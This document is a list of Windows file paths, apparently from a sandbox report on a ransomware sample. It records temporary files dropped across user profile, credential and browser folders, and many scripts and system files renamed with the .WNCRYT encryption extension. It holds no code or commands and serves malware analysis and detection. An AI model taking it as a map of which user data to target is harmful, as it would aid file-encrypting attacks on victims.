file: C:\Users\user\AppData\Roaming\Identities\{62195DA6-B982-4CC2-B681-2834060304B1}\~SD2804.tmp
file: C:\Users\user\AppData\Roaming\Media Center Programs\~SD2834.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\~SD2844.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\AddIns\~SD2855.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\~SD2866.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Bibliography\Style\~SD2876.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Credentials\~SD2887.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Crypto\~SD28A7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\~SD28C7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD28E8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\~SD2908.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\~SD2909.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\~SD2929.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Excel\~SD2949.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\~SD2979.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\~SD29A9.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SD29BA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\~SD29EA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\~SD29FA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\~SD2A2A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\~SD2A5A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\~SD2A7A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\MMC\~SD2AAA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Office\~SD2ADA.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\~SD2B0A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Proof\~SD2B3A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Protect\~SD2B79.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-1381398318-3211537236-2227685884-1000\~SD2BC8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Speech\~SD2C08.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\~SD2C38.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\~SD2C68.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\~SD2C88.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\~SD2CD7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\~SD2CE8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\~SD2D17.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\~SD2D47.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\~SD2D96.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\~SD2DA7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\~SD2DD7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\~SD2E93.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\~SD2EA4.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\~SD2EC4.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\~SD2EE5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\~SD2EF5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\~SD2EF6.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\UProof\~SD2EF7.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Vault\~SD2EF8.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\~SD2EF9.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\~SD2F0A.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\Low\~SD2F0B.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\~SD2F0C.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\DNTException\Low\~SD2F0D.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\~SD2F0E.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\~SD2F0F.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\~SD2F10.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\~SD2F20.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\~SD2F21.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\~SD2F22.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SD2F52.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SD2F63.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\~SD2F83.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\~SD2F94.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\~SD2FA4.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\~SD2FB5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\~SD2FF5.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\~SD3044.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\~SD3093.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\~SD30C3.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\~SD3102.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\~SD3132.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\~SD3162.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\~SD3182.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\~SD31A2.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD31C3.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\~SD31D3.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\~SD3203.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\~SD3233.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\~SD32C1.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg.WNCRYT
file: C:\Users\user\AppData\Roaming\Microsoft\Word\~SD331F.tmp
file: C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\~SD3330.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\~SD337F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Extensions\~SD33AF.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\~SD33DF.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\~SD340F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\~SD341F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending Pings\~SD3420.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\~SD3431.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\~SD3432.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\bookmarkbackups\~SD3443.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\~SD3444.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\crashes\events\~SD3445.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\~SD3446.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\~SD3447.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\archived\2024-08\~SD3457.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\~SD3458.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\db\~SD3459.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\events\~SD345A.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\pending_pings\~SD345B.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\datareporting\glean\tmp\~SD347C.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\minidumps\~SD348C.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\saved-telemetry-pings\~SD348D.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state\~SD348E.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups\~SD348F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings\~SD34A0.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\~SD34A1.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default\~SD34A2.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\~SD34A3.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\~SD34A4.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\~SD34A5.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\~SD3532.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\~SD35A1.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\~SD35D1.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\~SD3610.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\~SD3650.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\~SD369F.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary\~SD371D.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\~SD378B.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed\~SD37BB.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch\~SD37EB.tmp
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD380B.tmp
file: C:\Users\user\AppData\Roaming\Skype\~SD385A.tmp
file: C:\Users\user\AppData\Roaming\Skype\RootTools\~SD388A.tmp
file: C:\Users\user\AppData\Roaming\Sun\~SD38AA.tmp
file: C:\Users\user\AppData\Roaming\Sun\Java\~SD38BB.tmp
file: C:\Users\user\AppData\Roaming\Sun\Java\Deployment\~SD38DB.tmp
file: C:\Users\user\Contacts\~SD38EC.tmp
file: C:\Users\user\Desktop\~SD38ED.tmp
file: C:\Users\user\Documents\~SD38FE.tmp
file: C:\Users\user\Documents\WindowsPowerShell\~SD391E.tmp
file: C:\Users\user\Downloads\~SD393E.tmp
file: C:\Users\user\Favorites\~SD396E.tmp
file: C:\Users\user\Favorites\Links\~SD397F.tmp
file: C:\Users\user\Favorites\Links for United States\~SD39BE.tmp
file: C:\Users\user\Links\~SD39DE.tmp
file: C:\Users\user\Music\~SD3A0E.tmp
file: C:\Users\user\OneDrive\~SD3A2E.tmp
file: C:\Users\user\Pictures\~SD3A4F.tmp
file: C:\Users\user\Saved Games\~SD3A6F.tmp
file: C:\Users\user\Searches\~SD3AAE.tmp
file: C:\Users\user\Videos\~SD3AFE.tmp
file: C:\vlmcsd\~SD3B2D.tmp
file: C:\BOOTSECT.BAK.WNCRYT
file: C:\ba69bdf0a250e352360c33\header.bmp.WNCRYT
file: C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRYT
file: C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRYT
file: C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Move-LibraryDirectory.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Restart-Explorer.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-ExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-StartScreenOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-TaskbarSmall.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1.WNCRYT
file: C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\bin\RefreshEnv.cmd.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-PackageParameters.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Install-ChocolateyDesktopLink.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateyFailure.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-ChocolateySuccess.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-compatibility\helpers\Write-FileUpdateLog.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AppInstallLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-AvailableDriveLetter.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-EffectiveProxy.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-PackageCacheLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Get-WebContent.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Register-Application.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-core\Remove-Process.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\DotNetFrameworkHelpers.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Install-ChocolateyInstallPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-WindowsUpdateErrorDescription.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-ChocolateyPackageAndHandleExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Install-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Test-WindowsUpdate.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\chocolateyScriptRunner.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\ChocolateyTabExpansion.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Format-FileSize.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-CheckSumValid.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyPath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyUnzip.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ChocolateyWebFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-EnvironmentVariableNames.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-FtpFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-OSArchitectureWidth.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-PackageParameters.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-ToolsLocation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UACEnabled.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-UninstallRegistryKey.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-VirusCheckValid.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebFileName.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Get-WebHeaders.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-BinFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyEnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyExplorerMenuItem.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyFileAssociation.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyInstallPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPath.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPinnedTaskBarItem.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyPowershellCommand.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyShortcut.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyVsixPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-ChocolateyZipPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Install-Vsix.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Set-EnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Set-PowerShellExitCode.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Start-ChocolateyProcessAsAdmin.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Test-ProcessAdminRights.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-BinFile.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyEnvironmentVariable.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Uninstall-ChocolateyPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\UnInstall-ChocolateyZipPackage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Update-SessionEnvironment.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\helpers\functions\Write-FunctionCallLogMessage.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\chocolateyinstall.ps1.WNCRYT
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\setup.ps1.WNCRYT
